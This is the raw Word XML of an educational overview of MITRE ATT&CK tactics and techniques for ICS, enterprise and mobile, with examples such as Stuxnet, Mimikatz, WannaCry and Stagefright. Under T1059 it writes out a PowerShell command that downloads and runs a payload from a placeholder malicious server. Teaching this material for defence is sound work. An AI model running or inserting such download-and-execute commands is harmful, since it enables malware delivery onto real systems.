            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
            </w:pPr>
            <w:r w:rsidRPr="3E79F1B8" w:rsidR="3E79F1B8">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
              </w:rPr>
              <w:t>Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6165" w:type="dxa"/>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="3E79F1B8" w:rsidP="3E79F1B8" w:rsidRDefault="3E79F1B8" w14:paraId="6C58E324" w14:textId="4BE7B7FB">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
            </w:pPr>
            <w:r w:rsidR="3E79F1B8">
              <w:rPr/>
              <w:t>Caused physical destruction of Iranian nuclear centrifuges.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="3E79F1B8" w:rsidP="3E79F1B8" w:rsidRDefault="3E79F1B8" w14:paraId="51319352" w14:textId="5A52B377">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="55565A9B" w:rsidP="3E79F1B8" w:rsidRDefault="55565A9B" w14:paraId="599EE2A5" w14:textId="7F202FA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E79F1B8" w:rsidR="55565A9B">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Why ICS Tactics Are Critical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89"/>
        <w:gridCol w:w="6771"/>
      </w:tblGrid>
      <w:tr w:rsidR="3E79F1B8" w:rsidTr="3E79F1B8" w14:paraId="4BD8B217">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2589" w:type="dxa"/>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="3E79F1B8" w:rsidP="3E79F1B8" w:rsidRDefault="3E79F1B8" w14:paraId="27A31522" w14:textId="16D5D784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Reason</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6771" w:type="dxa"/>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="3E79F1B8" w:rsidP="3E79F1B8" w:rsidRDefault="3E79F1B8" w14:paraId="0EB9EAD5" w14:textId="56237635">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="3E79F1B8" w:rsidR="3E79F1B8">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
              </w:rPr>
              <w:t>Explanation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="3E79F1B8" w:rsidTr="3E79F1B8" w14:paraId="5515DE91">
        <w:trPr>
          <w:trHeight w:val="1005"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2589" w:type="dxa"/>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="3E79F1B8" w:rsidP="3E79F1B8" w:rsidRDefault="3E79F1B8" w14:paraId="56B52244" w14:textId="55FCE346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Protecting Critical Infrastructure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6771" w:type="dxa"/>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="3E79F1B8" w:rsidP="3E79F1B8" w:rsidRDefault="3E79F1B8" w14:paraId="08EA4132" w14:textId="5983022A">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
            </w:pPr>
            <w:r w:rsidR="3E79F1B8">
              <w:rPr/>
              <w:t>ICS attacks can stop power grids, water supply, or manufacturing plants—causing national emergencies.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="3E79F1B8" w:rsidTr="3E79F1B8" w14:paraId="2384757B">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2589" w:type="dxa"/>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="3E79F1B8" w:rsidP="3E79F1B8" w:rsidRDefault="3E79F1B8" w14:paraId="6A43103C" w14:textId="642DC4AE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Real-World Safety</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6771" w:type="dxa"/>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="3E79F1B8" w:rsidP="3E79F1B8" w:rsidRDefault="3E79F1B8" w14:paraId="399364E2" w14:textId="20739DFD">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
            </w:pPr>
            <w:r w:rsidR="3E79F1B8">
              <w:rPr/>
              <w:t>ICS failures can cause explosions, fires, or chemical leaks that harm human life.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="3E79F1B8" w:rsidTr="3E79F1B8" w14:paraId="4CA80274">
        <w:trPr>
          <w:trHeight w:val="930"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2589" w:type="dxa"/>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="3E79F1B8" w:rsidP="3E79F1B8" w:rsidRDefault="3E79F1B8" w14:paraId="4C9F0CDE" w14:textId="68B5D116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Different Environment</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6771" w:type="dxa"/>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="3E79F1B8" w:rsidP="3E79F1B8" w:rsidRDefault="3E79F1B8" w14:paraId="54C9C8C9" w14:textId="2EAC0BBA">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
            </w:pPr>
            <w:r w:rsidR="3E79F1B8">
              <w:rPr/>
              <w:t>ICS systems use legacy protocols, long device life cycles, and often lack modern security.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="3E79F1B8" w:rsidTr="3E79F1B8" w14:paraId="58B6866F">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2589" w:type="dxa"/>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="3E79F1B8" w:rsidP="3E79F1B8" w:rsidRDefault="3E79F1B8" w14:paraId="0F73B483" w14:textId="1DD3F44B">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
            </w:pPr>
            <w:r w:rsidR="3E79F1B8">
              <w:rPr/>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="3E79F1B8" w:rsidR="3E79F1B8">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
              </w:rPr>
              <w:t>Low Detection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6771" w:type="dxa"/>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="3E79F1B8" w:rsidP="3E79F1B8" w:rsidRDefault="3E79F1B8" w14:paraId="79F3CEF2" w14:textId="583EB5E1">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
            </w:pPr>
            <w:r w:rsidR="3E79F1B8">
              <w:rPr/>
              <w:t>ICS attackers focus on stealth and long-term control rather than quick data theft.</w:t>
            </w:r>
            <w:r w:rsidRPr="3E79F1B8" w:rsidR="3E79F1B8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6BF7CEB4" w:rsidP="3E79F1B8" w:rsidRDefault="6BF7CEB4" w14:paraId="77B1DA02" w14:textId="5B80C5CB">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="281" w:beforeAutospacing="off" w:after="281" w:afterAutospacing="off"/>
      </w:pPr>
      <w:r w:rsidRPr="3E79F1B8" w:rsidR="6BF7C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Cases of ICS Tactics in Security:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6BF7CEB4" w:rsidP="3E79F1B8" w:rsidRDefault="6BF7CEB4" w14:paraId="13D7D685" w14:textId="2C4DF78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BF7C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Threat Modeling</w:t>
      </w:r>
      <w:r w:rsidRPr="3E79F1B8" w:rsidR="6BF7CEB4">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>: Understanding how adversaries might attack a facility like a power plant.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6BF7CEB4" w:rsidP="3E79F1B8" w:rsidRDefault="6BF7CEB4" w14:paraId="3A4F616A" w14:textId="3C450CA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BF7C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 Team Exercises</w:t>
      </w:r>
      <w:r w:rsidRPr="3E79F1B8" w:rsidR="6BF7CEB4">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>: Simulating real ICS attack scenarios for testing defenses.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6BF7CEB4" w:rsidP="3E79F1B8" w:rsidRDefault="6BF7CEB4" w14:paraId="6A27E72B" w14:textId="37EEEE2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BF7C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 Team Defenses</w:t>
      </w:r>
      <w:r w:rsidRPr="3E79F1B8" w:rsidR="6BF7CEB4">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>: Monitoring specific behaviors tied to tactics like “Inhibit Response Function” or “Impair Process Control.”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6BF7CEB4" w:rsidP="3E79F1B8" w:rsidRDefault="6BF7CEB4" w14:paraId="52A311B1" w14:textId="42BED3A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6BF7C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Threat Intel Sharing</w:t>
      </w:r>
      <w:r w:rsidRPr="3E79F1B8" w:rsidR="6BF7CEB4">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>: Using shared language to describe ICS-specific threats (e.g., in ISAC reports).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="75AF78A6" w:rsidP="3E79F1B8" w:rsidRDefault="75AF78A6" w14:paraId="29136EC2" w14:textId="4D4EAEBD">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="3E79F1B8" w:rsidR="75AF78A6">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidRPr="3E79F1B8" w:rsidR="75AF78A6">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>echnique</w:t>
      </w:r>
      <w:r w:rsidRPr="3E79F1B8" w:rsidR="75AF78A6">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="3E79F1B8" w:rsidR="26A8F4BA">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(How)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5F511AF1" w:rsidP="3E79F1B8" w:rsidRDefault="5F511AF1" w14:paraId="19EDAF04" w14:textId="5D662933">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
      </w:pP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method or action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by a threat actor (attacker) to achieve a particular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tactic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>, which is a high-level goal like gaining access, stealing credentials, or executing code.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5F511AF1" w:rsidP="3E79F1B8" w:rsidRDefault="5F511AF1" w14:paraId="049E2443" w14:textId="2F4AF92E">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
      </w:pP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a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tactic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explains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attacker wants to do (e.g., "steal credentials"), the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explains </w:t>
      </w:r>
      <w:r w:rsidRPr="3E79F1B8" w:rsidR="5F511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>actually do</w:t>
      </w:r>
      <w:r w:rsidRPr="3E79F1B8" w:rsidR="5F511A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(e.g., "brute-force login attempts" or "credential dumping").</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="4DA5E20C" w:rsidP="3E79F1B8" w:rsidRDefault="4DA5E20C" w14:paraId="63F9E5C8" w14:textId="711A2F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Tactic (Why)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="4DA5E20C" w:rsidP="3E79F1B8" w:rsidRDefault="4DA5E20C" w14:paraId="0AB726BA" w14:textId="0175E7D5">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/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↳ Technique (How)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="4DA5E20C" w:rsidP="3E79F1B8" w:rsidRDefault="4DA5E20C" w14:paraId="06E10EC2" w14:textId="678F0838">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/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↳ Sub-technique (More specific how)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="4DA5E20C" w:rsidP="3E79F1B8" w:rsidRDefault="4DA5E20C" w14:paraId="5070D3B1" w14:textId="08A0DFF8">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/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↳ Procedure (Real-world example)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="4DA5E20C" w:rsidP="3E79F1B8" w:rsidRDefault="4DA5E20C" w14:paraId="2F57F2AE" w14:textId="1B42A131">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/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4DA5E20C" w:rsidP="3E79F1B8" w:rsidRDefault="4DA5E20C" w14:paraId="7F810733" w14:textId="2D4561A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Tactic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: Credential Access (TA0006)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="4DA5E20C" w:rsidP="3E79F1B8" w:rsidRDefault="4DA5E20C" w14:paraId="7AAD4FCF" w14:textId="115A08F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: Brute Force (T1110)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="4DA5E20C" w:rsidP="3E79F1B8" w:rsidRDefault="4DA5E20C" w14:paraId="13B667C1" w14:textId="092415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Sub-technique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: Password Guessing (T1110.001)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="4DA5E20C" w:rsidP="3E79F1B8" w:rsidRDefault="4DA5E20C" w14:paraId="6B98393F" w14:textId="428D379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>: “APT28 used Hydra to brute-force RDP credentials.”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3E79F1B8" w:rsidP="3E79F1B8" w:rsidRDefault="3E79F1B8" w14:paraId="753143AE" w14:textId="26F98D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A5E20C" w:rsidP="3E79F1B8" w:rsidRDefault="4DA5E20C" w14:paraId="778B3488" w14:textId="16B345B6">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="299" w:beforeAutospacing="off" w:after="299" w:afterAutospacing="off"/>
      </w:pPr>
      <w:r w:rsidRPr="3E79F1B8" w:rsidR="4DA5E20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Does a Technique Describe?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="4DA5E20C" w:rsidP="3E79F1B8" w:rsidRDefault="4DA5E20C" w14:paraId="3EB32A20" w14:textId="6F3E2C2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steal data, hide presence, run code).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="4DA5E20C" w:rsidP="3E79F1B8" w:rsidRDefault="4DA5E20C" w14:paraId="0A86582B" w14:textId="1DAB875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scripts, malware, physical device access).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="4DA5E20C" w:rsidP="3E79F1B8" w:rsidRDefault="4DA5E20C" w14:paraId="33029DF5" w14:textId="0C1AF5A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targets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(systems, apps, protocols).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="4DA5E20C" w:rsidP="3E79F1B8" w:rsidRDefault="4DA5E20C" w14:paraId="5FB94671" w14:textId="6BC4E56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indicators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(IOCs: logs, changes, behaviors).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="4DA5E20C" w:rsidP="3E79F1B8" w:rsidRDefault="4DA5E20C" w14:paraId="5308D925" w14:textId="7162A81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79F1B8" w:rsidR="4DA5E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</w:t>
      </w:r>
      <w:r w:rsidRPr="3E79F1B8" w:rsidR="4DA5E2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(Windows, macOS, Android, ICS, etc.)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="018857D8" w:rsidP="3E79F1B8" w:rsidRDefault="018857D8" w14:paraId="0CEB0A10" w14:textId="04878ED5">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="299" w:beforeAutospacing="off" w:after="299" w:afterAutospacing="off"/>
      </w:pPr>
      <w:r w:rsidRPr="3E79F1B8" w:rsidR="018857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Why Techniques Are Important:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="018857D8" w:rsidP="3E79F1B8" w:rsidRDefault="018857D8" w14:paraId="5DFAE6E4" w14:textId="2708158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018857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on Attacker Behavior</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w: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Techniques help defenders understand real-world actions attackers take, beyond just tools or malware names.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="018857D8" w:rsidP="3E79F1B8" w:rsidRDefault="018857D8" w14:paraId="3E7F0847" w14:textId="112FA3A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018857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Detection &amp; Hunting</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w: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Security teams use techniques to tune their tools (e.g., SIEM, EDR) to detect specific behaviors.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="018857D8" w:rsidP="3E79F1B8" w:rsidRDefault="018857D8" w14:paraId="526E2A21" w14:textId="1501EAB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018857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Threat Intelligence Sharing</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w: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standard techniques makes it easier to share information across organizations.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="018857D8" w:rsidP="3E79F1B8" w:rsidRDefault="018857D8" w14:paraId="66C02562" w14:textId="7712B76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️ </w:t>
      </w:r>
      <w:r w:rsidRPr="3E79F1B8" w:rsidR="018857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 &amp; Blue Team Planning</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="3E79F1B8" w:rsidR="01885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 teams simulate attack techniques to test defenses; blue teams build defenses based on known techniques.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3E79F1B8" w:rsidP="3E79F1B8" w:rsidRDefault="3E79F1B8" w14:paraId="66F3C5AD" w14:textId="6B476F8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7E24C8" w:rsidP="3E79F1B8" w:rsidRDefault="537E24C8" w14:paraId="6A380466" w14:textId="35619900">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr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Enterprise Techniques (MITRE ATT&amp;CK Enterprise Matrix)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="537E24C8" w:rsidP="3E79F1B8" w:rsidRDefault="537E24C8" w14:paraId="4B662991" w14:textId="2ADCC990">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="281" w:beforeAutospacing="off" w:after="281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T1059 – Command and Scripting Interpreter</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="537E24C8" w:rsidP="3E79F1B8" w:rsidRDefault="537E24C8" w14:paraId="15D93213" w14:textId="490D3C6F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This technique allows attackers to run malicious scripts or commands using interpreters like PowerShell, Bash, or CMD. It is one of the most commonly used methods post-compromise.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="537E24C8" w:rsidP="3E79F1B8" w:rsidRDefault="537E24C8" w14:paraId="3B775FF7" w14:textId="62CAA858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hacker gains initial access through phishing and uses PowerShell to download and execute malware:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="537E24C8" w:rsidP="3E79F1B8" w:rsidRDefault="537E24C8" w14:paraId="640A9A2C" w14:textId="278867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w:rsidR="537E24C8" w:rsidP="3E79F1B8" w:rsidRDefault="537E24C8" w14:paraId="49F6EAC1" w14:textId="1B7EBD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Invoke-WebRequest </w:t>
      </w:r>
      <w:hyperlink r:id="R8f1102bc0c494761">
        <w:r w:rsidRPr="3E79F1B8" w:rsidR="537E24C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http://malicious-server.com/payload.exe</w:t>
        </w:r>
      </w:hyperlink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-OutFile payload.exe</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r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>Start-Process payload.exe</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="537E24C8" w:rsidP="3E79F1B8" w:rsidRDefault="537E24C8" w14:paraId="7C8D7377" w14:textId="1715B1A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This was used by APT32 to execute commands and scripts on compromised endpoints.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="537E24C8" w:rsidP="3E79F1B8" w:rsidRDefault="537E24C8" w14:paraId="3BEE01CB" w14:textId="15CF4DC7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T1566 – Phishing</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="537E24C8" w:rsidP="3E79F1B8" w:rsidRDefault="537E24C8" w14:paraId="55A150A9" w14:textId="0F0ED501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Attackers send deceptive emails to trick users into clicking malicious links or downloading malware-infected attachments. This is a common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Access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technique.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="537E24C8" w:rsidP="3E79F1B8" w:rsidRDefault="537E24C8" w14:paraId="16BEDF6E" w14:textId="39634707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SolarWinds breach, spear-phishing emails were used to target employees, some of whom unknowingly executed malicious attachments that granted remote access to attackers.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3E79F1B8" w:rsidRDefault="3E79F1B8" w14:paraId="2F845396" w14:textId="0D6D3C37"/>
    <w:p w:rsidR="537E24C8" w:rsidP="3E79F1B8" w:rsidRDefault="537E24C8" w14:paraId="30E14A0D" w14:textId="03A59109">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="281" w:beforeAutospacing="off" w:after="281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3. T1204.002 – User Execution: Malicious File</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="537E24C8" w:rsidP="3E79F1B8" w:rsidRDefault="537E24C8" w14:paraId="5808076B" w14:textId="000E459E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This technique involves luring users into opening a file (e.g., PDF, DOCX) with embedded malware.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="537E24C8" w:rsidP="3E79F1B8" w:rsidRDefault="537E24C8" w14:paraId="21E05DEE" w14:textId="1BD868E8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Attackers use a resume-themed document with a malicious macro. Once the user enables macros, the embedded script runs, downloading malware in the background.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="537E24C8" w:rsidP="3E79F1B8" w:rsidRDefault="537E24C8" w14:paraId="2E506CDF" w14:textId="3E5621C6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4. T1003 – OS Credential Dumping</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="537E24C8" w:rsidP="3E79F1B8" w:rsidRDefault="537E24C8" w14:paraId="1DE377E1" w14:textId="26440FC2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Once attackers are inside the network, they may try to extract login credentials from memory.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="537E24C8" w:rsidP="3E79F1B8" w:rsidRDefault="537E24C8" w14:paraId="01090613" w14:textId="5BDE163F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 of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Mimikatz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dump credentials from LSASS (Local Security Authority Subsystem Service) is a known case. These credentials are later used for lateral movement or privilege escalation.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="537E24C8" w:rsidP="3E79F1B8" w:rsidRDefault="537E24C8" w14:paraId="5847A430" w14:textId="3096BE74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5. T1486 – Data Encrypted for Impact (Ransomware)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="537E24C8" w:rsidP="3E79F1B8" w:rsidRDefault="537E24C8" w14:paraId="61AA24F3" w14:textId="43957AD4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encrypt files on the victim's system to demand a ransom for decryption.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="537E24C8" w:rsidP="3E79F1B8" w:rsidRDefault="537E24C8" w14:paraId="27576FCB" w14:textId="12DEFB5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WannaCry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ransomware attack, systems across the globe were encrypted, and users were asked to pay Bitcoin to regain access to their data.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3E79F1B8" w:rsidP="3E79F1B8" w:rsidRDefault="3E79F1B8" w14:paraId="726F568D" w14:textId="211BB1B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E79F1B8" w:rsidP="3E79F1B8" w:rsidRDefault="3E79F1B8" w14:paraId="02AC1AC1" w14:textId="53B255B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537E24C8" w:rsidP="3E79F1B8" w:rsidRDefault="537E24C8" w14:paraId="5EF6D4B5" w14:textId="1FD6AA8D">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="3E79F1B8" w:rsidR="537E24C8">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2. Mobile Techniques (MITRE ATT&amp;CK Mobile Matrix)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="537E24C8" w:rsidP="3E79F1B8" w:rsidRDefault="537E24C8" w14:paraId="7E4B4FC8" w14:textId="0F9952D2">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="281" w:beforeAutospacing="off" w:after="281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T1406 – Exploitation for Client Execution</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="537E24C8" w:rsidP="3E79F1B8" w:rsidRDefault="537E24C8" w14:paraId="2EBF1891" w14:textId="623421B4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exploit vulnerabilities in mobile OS or apps to execute code.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="537E24C8" w:rsidP="3E79F1B8" w:rsidRDefault="537E24C8" w14:paraId="62EB58B9" w14:textId="79B3E84E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Stagefright exploit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Android used malicious MMS messages to execute code without user interaction, affecting millions of devices.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="537E24C8" w:rsidP="3E79F1B8" w:rsidRDefault="537E24C8" w14:paraId="65BABB6E" w14:textId="1C8AE162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2. T1417 – Input Capture (Keylogging)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="537E24C8" w:rsidP="3E79F1B8" w:rsidRDefault="537E24C8" w14:paraId="7FFE0595" w14:textId="37FF5C4F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capture user input like passwords or PINs.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="537E24C8" w:rsidP="3E79F1B8" w:rsidRDefault="537E24C8" w14:paraId="43E534DD" w14:textId="0FC5000A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trojanized banking apps use accessibility services to read everything typed on the device, effectively logging keystrokes and stealing banking credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="537E24C8" w:rsidP="3E79F1B8" w:rsidRDefault="537E24C8" w14:paraId="11110CB5" w14:textId="2F98FCEC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3. T1476 – Deliver Malicious App via App Store</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="537E24C8" w:rsidP="3E79F1B8" w:rsidRDefault="537E24C8" w14:paraId="7FEC6330" w14:textId="7221558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upload a malicious or trojanized app to official app stores.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="537E24C8" w:rsidP="3E79F1B8" w:rsidRDefault="537E24C8" w14:paraId="76C7CF21" w14:textId="7C9F0617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2017, Google had to remove dozens of apps infected with malware from the Play Store. One such malware,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Judy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, affected over 36 million Android devices worldwide.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="537E24C8" w:rsidP="3E79F1B8" w:rsidRDefault="537E24C8" w14:paraId="7B8DAC10" w14:textId="44C7CDFB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4. T1409 – Modify System Partition</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="537E24C8" w:rsidP="3E79F1B8" w:rsidRDefault="537E24C8" w14:paraId="0687FB46" w14:textId="39CDF329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modify system files to gain deeper control or persistence.</w:t>
      </w:r>
    </w:p>
